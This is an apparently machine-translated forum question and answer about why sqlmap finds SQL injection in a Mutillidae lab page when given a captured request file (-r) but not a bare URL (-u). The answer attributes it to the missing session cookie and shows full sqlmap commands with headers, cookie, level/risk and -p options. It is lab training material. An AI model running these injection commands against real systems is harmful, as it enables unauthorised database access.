SQLmap: использование команд -u и -r

ПРИМЕЧАНИЕ. Попытка использования Mutillidae METASPLOITABLE

Я попытался использовать SQLmap для ввода на страницу «Информация о пользователе» mutilidae.

Я уже делал попытку ручной инъекции, а уязвимыми параметрами являются USERNAME и PASSWORD.

в то время как я использовал команду -u в SQLmap, параметр PAGE считался параметром GET SQLmap, который, в свою очередь (как и ожидалось), приводил к тому, что URL не был инъекционным.

Позже, используя прокси-сервер Burp и выполнив команду SQLmap через команду -r, все работает отлично для одного и того же URL-адреса.

Я смущен тем, как работают эти две команды, и что было поставлено в команде -r, что позволило успешно внедрить, чего не было в указанном мной URL -u.

Когда следует использовать какую команду?

Использование команды -u для проверки уязвимости

sqlmap -u http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details

Использование команды -r

sqlmap -r /root/Desktop/user.request

user.request содержит следующее:

GET /mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: xxx.xxx.2.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details
Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 31 May 2018 06:13:15 GMT

linux,penetration-testing,sqlmap,kali-linux,

0

Ответов: 1


0

Похоже, вам не хватает файла cookie в части -u:

Cookie: PHPSESSID=cb55bd05e9618af173600ba757e996c1

Добавьте в свою команду следующие аргументы:

sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=cb55bd05e9618af173600ba757e996c1" -u 'http://xxx.xxx.2.9/mutillidae/index.php?page=user-info.php&username=a&password=b&user-info-php-submit-button=View+Account+Details' --level=5 risk=3

Уровень и риск экстремальны и вынуждают Sqlmap использовать почти все, что ему нужно, чтобы протестировать вашу клиентскую машину ... в этом конкретном контексте они вам действительно не нужны, но это хорошо, о чем нужно знать.

Если вы хотите указать параметр, который вы хотите проверить Sqlmap, используйте параметр -p, например:

-p username

Наконец, чтобы ответить на вторую часть вашего вопроса, когда вы должны использовать -r vs -u, это действительно выбор пользователя, вам может показаться более удобным сбрасывать вашу HTTP-информацию в файл и читать непосредственно с нее (основное использование -r), или вы можете обнаружить, что хотите больше контролировать то, что вы отправляете, и хотите настроить его в командной строке (основное использование -u)

Linux, проникновение тестирования, sqlmap, поташ-линукс,
Похожие вопросы
Яндекс.Метрика